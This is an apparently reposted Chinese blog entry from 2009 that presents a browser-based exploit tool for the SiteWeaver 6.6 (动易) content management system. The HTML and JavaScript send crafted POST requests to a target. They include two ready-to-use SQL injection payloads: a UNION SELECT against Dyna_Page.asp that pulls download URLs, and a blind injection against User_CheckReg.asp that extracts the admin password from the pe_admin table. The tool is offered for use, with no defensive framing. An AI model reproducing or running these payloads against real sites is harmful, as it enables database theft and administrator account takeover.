动易SiteWeaver6.6版最新漏洞利用工具

2009年11月24日星期二 | | |

动易SiteWeaver6.6版最新漏洞利用工具

作者:Cschii
来源:黑客防线

  1. <script> 
  2. function gb2utf8(data){  
  3. var glbEncode = [];  
  4. gb2utf8_data = data;  
  5. execScript("gb2utf8_data = MidB(gb2utf8_data, 1)", "VBScript");  
  6. var t=escape(gb2utf8_data).replace(/%u/g,"").replace(/(.{2})(.{2})/g,"%$2%$1").replace(/%([A-Z].)%(.{2})/g,"@$1$2");  
  7. tt=t.split("@");  
  8. var i=0,j=t.length,k;  
  9. while(++i<j) {  
  10. k=t[i].substring(0,4);  
  11. if(!glbEncode[k]) {  
  12. gb2utf8_char = eval("0x"+k);  
  13. execScript("gb2utf8_char = Chr(gb2utf8_char)", "VBScript");  
  14. glbEncode[k]=escape(gb2utf8_char).substring(1,6);  
  15. }  
  16. t[i]=glbEncode[k]+t[i].substring(4);  
  17. }  
  18. gb2utf8_data = gb2utf8_char = null;  
  19. return unescape(t.join("%"));  
  20. }  
  21.  
  22. function PostData(){  
  23. var url = document.getElementById("url").value;  
  24. var postdocument.getElementById("post").value;  
  25. var oXmlHttp = new ActiveXObject("Microsoft.XMLHTTP");  
  26. oXmlHttp.open("POST", url, false);  
  27. if (url.indexOf("User_CheckReg.asp")>0){oXmlHttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded");}  
  28. oXmlHttp.send(post);  
  29. var GetResult=gb2utf8(oXmlHttp.responseBody);  
  30. if (oXmlHttp.readyState == 4) {  
  31. if (oXmlHttp.status == 200) {  
  32. document.getElementById("getResult").value = GetResult;  
  33. }  
  34. }  
  35. }  
  36. function Inject(i){  
  37. if (i==1){  
  38. document.getElementById("url").value="http://127.0.0.1:81/pe2006/Dyna_Page.asp";  
  39. document.getElementById("post").value='<?xml version="1.0" encoding="gb2312"?><root><id>21</id><page>1</page><value>0 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,DownloadUrl,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52 from PE_soft where softid=1|1</value></root>';  
  40. }  
  41. else  
  42. {  
  43. document.getElementById("url").value="http://127.0.0.1:81/pe2006/Reg/User_CheckReg.asp";  
  44. document.getElementById("post").value="UserName=admino'%20union%20select%201%20from%20pe_admin%20where%20username='admin'band%20Mid(password,1,1)>'0";  
  45. }  
  46. }  
  47.  
  48. </script> 
  49. <BODY> 
  50. <div align="center">动易SiteWeaver6.6版最新漏洞利用工具</div> 
  51. 请输入URL:<br> 
  52. <INPUT TYPE="text" id="url" value="http://127.0.0.1:81/pe2006/Dyna_Page.asp" style="width:90%;">    <br> 
  53. 输入Post:<br> 
  54. <textArea id="post" style="width:90%; height:80;"><?xml version="1.0" encoding="gb2312"?> 
  55. <root><id>21</id><page>1</page><value>0 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,DownloadUrl,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52 from PE_soft where softid=1|1</value></root></textArea> 
  56. <div align="center"><INPUT TYPE="button" value="漏洞一示例" onClick="Inject(1);">   <INPUT TYPE="button" value=" 提 交 " onClick="PostData();">   <INPUT TYPE="button" value="漏洞二示例" onClick="Inject(2);"></div> 
  57. <hr size=2 > 
  58. 注入结果:<br> 
  59. <textArea id="getResult" style="width:90%; height:200;"></textArea> 
  60. </BODY> 
From:http://www.sai52.com/archives/811/
我的QQ空间
kmeleon.js及pref.js配置解释
K-MeleonCCF ME目录下的defaults\pref\kmeleon.js保存了K-Meleon...
 

0 评论:


所有文章收集于网络,如果有牵扯到版权问题请与本站站长联系。谢谢合作![email protected]